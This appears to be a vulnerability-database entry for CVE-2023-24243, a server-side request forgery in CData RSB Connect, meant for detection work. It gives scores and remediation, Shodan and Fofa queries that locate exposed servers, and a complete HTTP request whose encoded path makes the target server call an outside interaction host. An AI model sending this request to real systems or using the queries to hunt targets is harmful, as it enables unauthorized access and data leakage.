🔙 목록으로 돌아가기

CVE-2023-24243: CData RSB Connect v22.0.8336 - Server Side Request Forgery

TitleCData RSB Connect v22.0.8336 - Server Side Request Forgery
Authorritikchaddha
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the server, potentially leading to unauthorized access or data leakage.
RemediationApply the latest security patches or updates provided by CData to fix the SSRF vulnerability in RSB Connect v22.0.8336.
CVSS Score7.5
EPSS Score0.88609
CVE IDCVE-2023-24243
CWE IDCWE-918
Shodan Queryhttp.favicon.hash:163538942http.favicon.hash:"163538942"
Fofa Queryicon_hash="163538942"
Tags cve cve2023 cdata rsb ssrf vuln

🔍 Vulnerability Description

CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF).

🌐 HTTP Request

GET /%255c%255cd5jkl29le0o2k437etc0euhfycwomrdwu.oast.me%255cC$%255cbb HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/537.86.4
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-24243.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-24243.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A